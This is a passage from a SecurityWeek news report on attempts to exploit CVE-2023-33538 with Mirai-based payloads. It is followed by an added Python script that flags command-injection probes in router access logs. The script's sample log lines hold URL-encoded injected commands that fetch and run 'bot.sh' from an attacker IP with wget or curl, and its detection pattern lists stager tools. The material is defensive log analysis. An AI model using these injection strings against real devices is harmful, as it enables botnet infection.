Now, Palo Alto Networks says the activity surrounding CVE-2023-33538’s exploitation that it has been tracking since June last year has involved Mirai-based payloads similar to the Condi IoT botnet binaries.

The payload was designed to turn the infected devices into HTTP servers that would deliver malware binaries to requesting clients (other infected devices).

Palo Alto Networks’ dive into the exploitation attempts has confirmed the existence of the underlying vulnerability, while uncovering errors in the exploit code that prevented attackers from successfully exploiting the CVE.

Hackers, it says, attempted to exploit the bug without authentication, targeted the wrong parameter, and relied on a utility not present in the vulnerable devices’ BusyBox environment.

“This demonstrates a common attack pattern of scanning and probing with incomplete or inaccurate exploit code, resulting in noisy but ultimately ineffective attacks,” the cybersecurity firm says.

Successful exploitation of the command injection issue, Palo Alto Networks explains, could lead to denial-of-service (DoS) conditions or could allow attackers to achieve persistent access to the vulnerable devices.
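The noisy, mostly failed probing the report describes is exactly what shows up in a router's web-server access log, whether or not the injected command ever ran. The script below is an added example, not code from SecurityWeek or from Palo Alto Networks' report: it scans constructed access-log lines for command-injection probes in query parameters, records whether the request carried credentials and whether the device rejected it, and tallies the result per source. The Common Log Format layout (with its authenticated-user field), the /cgi-bin paths, the `name` parameter and the sample lines are all assumptions chosen for illustration; they are not the vulnerable endpoint or parameter of CVE-2023-33538, which the article does not name.

```python
"""Flag command-injection probes in router HTTP access logs.

Added example, not from the SecurityWeek article or Palo Alto Networks'
report. Log format, URL paths and parameter names are assumptions; the
log lines below are constructed, not captured traffic.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample in Common Log Format (assumption). Field 3 is the
# HTTP-auth user, so "-" marks an unauthenticated request.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Jun/2025:12:00:01 +0000] "GET /cgi-bin/status.cgi?lang=en HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jun/2025:12:00:02 +0000] "GET /cgi-bin/wlan.cgi?name=a%3Bwget%20http%3A%2F%2F198.51.100.7%2Fbot.sh%20-O%20%2Ftmp%2Fx%3Bsh%20%2Ftmp%2Fx HTTP/1.1" 401 0 "-" "Hello-World"
198.51.100.7 - admin [01/Jun/2025:12:00:03 +0000] "GET /cgi-bin/wlan.cgi?name=a%60curl%20198.51.100.7%2Fbot.sh%7Csh%60 HTTP/1.1" 200 88 "-" "Hello-World"
192.0.2.55 - - [01/Jun/2025:12:00:04 +0000] "GET /cgi-bin/wlan.cgi?name=MyHomeWiFi HTTP/1.1" 401 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Shell metacharacters that chain or substitute commands inside a
# decoded parameter value; a bare newline covers %0a tricks.
METACHAR_RE = re.compile(r'(;|\|\||&&|\||`|\$\(|\n)')

# Download-and-run helpers commonly seen in IoT botnet stagers. Whether
# a given helper exists on the target's BusyBox build is what decides if
# a probe like this can succeed, which is why the match is reported, not
# treated as proof of compromise.
STAGER_RE = re.compile(r'\b(?:wget|curl|tftp|busybox|nc|ftpget|sh)\b|/tmp/')


def analyze_line(line):
    """Return a finding dict for a probe-looking request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group('url'))
    hits = []
    # parse_qsl percent-decodes values, so encoded ';' and '`' are seen.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        metas = sorted(set(METACHAR_RE.findall(value)))
        if not metas:
            continue
        stagers = sorted(set(STAGER_RE.findall(value)))
        hits.append({'param': name, 'metachars': metas, 'stagers': stagers})
    if not hits:
        return None
    status = int(m.group('status'))
    return {
        'ip': m.group('ip'),
        'path': url.path,
        'authenticated': m.group('user') != '-',
        'status': status,
        'rejected': status in (401, 403),
        'hits': hits,
    }


def summarize(lines):
    """Tally probes, unauthenticated probes and rejections per source."""
    findings = [f for f in (analyze_line(l) for l in lines) if f]
    return {
        'probes': len(findings),
        'unauthenticated': sum(1 for f in findings if not f['authenticated']),
        'rejected': sum(1 for f in findings if f['rejected']),
        'by_source': dict(Counter(f['ip'] for f in findings)),
    }


if __name__ == '__main__':
    for entry in SAMPLE_LOG.splitlines():
        finding = analyze_line(entry)
        if finding:
            print(finding)
    print(summarize(SAMPLE_LOG.splitlines()))
```

Run against the sample, the benign status and SSID-change requests produce nothing, the unauthenticated probe is flagged and shown as rejected with a 401, and the second attempt from the same source, this time with credentials, is flagged with a 200. The summary is the view a SOC wants from this kind of campaign: how many probes per source, how many never got past authentication, and therefore how much of the noise was ineffective.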
Source: SecurityWeek